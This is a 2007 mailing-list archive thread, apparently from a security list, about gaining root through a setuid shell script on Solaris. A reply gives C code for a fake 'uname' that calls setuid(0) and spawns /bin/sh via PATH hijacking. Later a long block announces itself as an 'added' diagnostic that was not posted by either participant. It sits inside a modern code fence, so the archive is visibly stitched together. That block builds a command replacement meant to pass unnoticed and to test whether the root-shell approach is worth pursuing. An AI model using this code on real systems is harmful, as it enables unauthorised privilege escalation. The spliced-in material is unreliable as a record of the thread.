Re: solaris root-setuid script to gain root?

From: Vitalik N. (robert.morris.jr@gmail.com)
Date: Sun Jul 01 2007 - 01:53:39 EDT


On 7/1/07, Thomas Pollet <thomas.pollet@gmail.com> wrote:
> Hello,
>
> On 30/06/07, Vitalik N. <robert.morris.jr@gmail.com> wrote:
> > Hi
> >
> > I was doing pen testing the other day and I found one root suid script
> > left by some of the web developers:
> >
> > -rwsr-x--x 1 root users /home/web/c.cgi
> >
> > which is basically a bash script:
> >
> > ------ cut ------------
> > #!/bin/sh
> >
> > uname
> > ------ cut ------------
> >
> > And our system was recently compromised. Some local user was able to
> > gain root access. Could this script be the way of gaining root access?
> >
> > According to http://www.unix.com/tips-and-tutorials/36711-the-whole-story-on-usr-bin-ksh.html
> > "Because it was not possible to write a secure suid shell script, the concept
> > of suid shell scripts was removed from Unix." But then it says "Solaris now
> > supports suid shell"!
> > I tried modifying the PATH variable and creating my own "uname" program.
> > But my uname program runs with local user privs instead of root. I
> > also tried the
> Did you put a setuid(0) in your uname program?
>
> f.i.:
> cat >uname.c<<EOF
> #include <unistd.h>
> int main (int argc, char **argv, char **envp) {
> /* only succeeds if the script's child inherited an effective uid of 0 */
> setuid(0);
> setgid(0);
> /* replace this process with a shell carrying the now-real root uid */
> execve("/bin/sh",argv,envp);
> }
> EOF
>
> > other attack described in the link above ("link to -i"), but this didn't
> > work either.
> > So could this script be the problem?
> >
> > P.S.: The machine runs SunOS 5.6 with all updates.
>
> Regards,
> Thomas Pollet
>

Yes, my uname program was exactly the same, but I used an execl call instead
of execve (I don't think that would make any difference). I also tried
setting the euid (seteuid(0)).
Using a bash script for the "uname" program didn't work either:

% cat uname
#!/bin/sh
touch /tmp/test
chown root /tmp/test

The script complains about privileges and can't execute chown.

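An added diagnostic, not code posted by either participant above: before putting a setuid(0) into the hijacked "uname", find out what credentials the setuid script's child process actually inherits. This drop-in "uname" records real/effective uid and gid to a log and then execs the real command so the script keeps working. The log path /tmp/uname-cred.log and the real-uname location /usr/bin/uname are assumptions (Solaris keeps uname under /usr/bin). If the log never shows euid=0 with a non-zero ruid, the interpreter was not running as root to begin with (for instance because the filesystem holding the script is mounted nosuid, in which case the kernel ignores the setuid bit), and no setuid(0) or seteuid(0) in the replacement can succeed.

```c
/* Diagnostic "uname" replacement (added example; hypothetical paths).
 * Build it, put its directory first in PATH, run the setuid script, then
 * read /tmp/uname-cred.log to see which credentials the child really had. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* A setuid-root script only hands a local user root if the commands it
 * runs inherit effective uid 0 while the real uid is still the caller's. */
int script_leaks_root(uid_t ruid, uid_t euid) {
    return euid == 0 && ruid != 0;
}

/* Format the four credentials as one record into buf.  Returns the number
 * of characters written, or -1 if buf is too small to hold the record. */
int format_cred_record(char *buf, size_t buflen,
                       uid_t ruid, uid_t euid, gid_t rgid, gid_t egid) {
    int n = snprintf(buf, buflen, "ruid=%lu euid=%lu rgid=%lu egid=%lu",
                     (unsigned long)ruid, (unsigned long)euid,
                     (unsigned long)rgid, (unsigned long)egid);
    if (n < 0 || (size_t)n >= buflen)
        return -1;
    return n;
}

int main(int argc, char **argv) {
    const char *logpath = "/tmp/uname-cred.log";   /* assumed log location */
    char rec[128];
    FILE *fp;
    (void)argc;

    /* Record what we inherited before attempting anything privileged. */
    if (format_cred_record(rec, sizeof rec, getuid(), geteuid(),
                           getgid(), getegid()) > 0 &&
        (fp = fopen(logpath, "a")) != NULL) {
        fprintf(fp, "%s leaks_root=%d\n", rec,
                script_leaks_root(getuid(), geteuid()));
        fclose(fp);
    }

    /* Behave like the real command so the calling script does not notice. */
    execv("/usr/bin/uname", argv);   /* assumed path of the real uname */
    perror("execv");
    return 127;
}
```

Compile with `cc -o uname uname.c`, then `PATH=$(dirname $(pwd)/uname):$PATH /home/web/c.cgi` and inspect the log. The chown failure reported in the reply above is consistent with the child never having euid 0; the log turns that guess into an observation, and only a line with `leaks_root=1` means the setuid(0) approach is worth pursuing.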



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:55 EDT